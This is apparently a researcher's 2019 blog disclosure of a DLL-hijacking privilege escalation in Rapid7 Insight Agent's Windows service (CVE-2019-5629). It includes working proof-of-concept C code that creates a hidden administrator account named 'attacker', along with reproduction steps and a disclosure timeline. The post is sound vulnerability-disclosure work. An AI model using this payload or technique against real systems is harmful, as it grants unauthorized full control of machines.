Jun 032019
 

With Insight IDR Rapid7 has created a very powerful, yet still easy to use Incident Detection and Response toolkit. During one of my latest assignments I found its Windows agent installed on my client’s systems.

While trying to disable it so that I can stay under the radar, I discovered a privilege escalation vulnerability in its Windows service. This vulnerability could be abused by any local user to gain full control over the affected system. It has been verified on a fully patched German Windows 10 x64 running Insight Agent v2.6.3.14. The issue has been fixed with version 2.6.5.

PS: Did I mention that I run my own company? It’s called Bee IT Security[German only], just in case you need world class penetration testing or security consulting services.

The underlying issue is that the ir_agent Windows Service, which is automatically started on system boot and runs with SYSTEM privileges, tries to load the DLL C:\DLLs\python3.dll

Although this path does not exist by default, it can be created by any local user. This is possible because the filesystem ACLs of the system drive allow anyone to create new subfolders.

With that knowledge, I created a new DLL that mimics the expected exports of the real python3.dll. However, instead of providing any of the expected functionality, it simply adds a new administrative user “attacker” to the system. You can download the full source here.

/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
Otherwise this would cause several compile errors because of the already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
	system("cmd /c \"date >> C:\\this_should_not_work.txt\"");
	system("net user attacker Batman42 /add");
	system("net localgroup Administrators attacker /add");
	system("net localgroup Administratoren attacker /add");
	exit(1);
	return 0;
}
...

After compiling it into a DLL I saved it (logically with a standard User account) as C:\DLLs\python3.dll.

After a reboot the DLL was loaded by the privileged Windows service ir_agent and the user attacker was created.

Proof of Concept

To confirm this issue yourself install the Insight IDR Windows Agent v2.6.3.14 (The issue has been fixed with version 2.6.5) and download the precompiled version of the malicious exploit DLL.

After that, as a non-admin user, create the folder C:\DLLs and place the library python3.dll therein. Now simply reboot the system. After that the new admin user attacker will be added. This proofs that full SYSTEM level access has been gained.

Suggested solution

All external dependencies should only be loaded from secure locations.

Timeline

  • 22.5.2019: The issue has been identified, documented and reported
  • 22.5.2019: The vulnerability has been confirmed by Rapid7
  • 29.5.2019: Rapid7 released a new version (2.6.5) of the Insight agent that fixes this vulnerability. CVE-2019-5629 has been assigned.

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)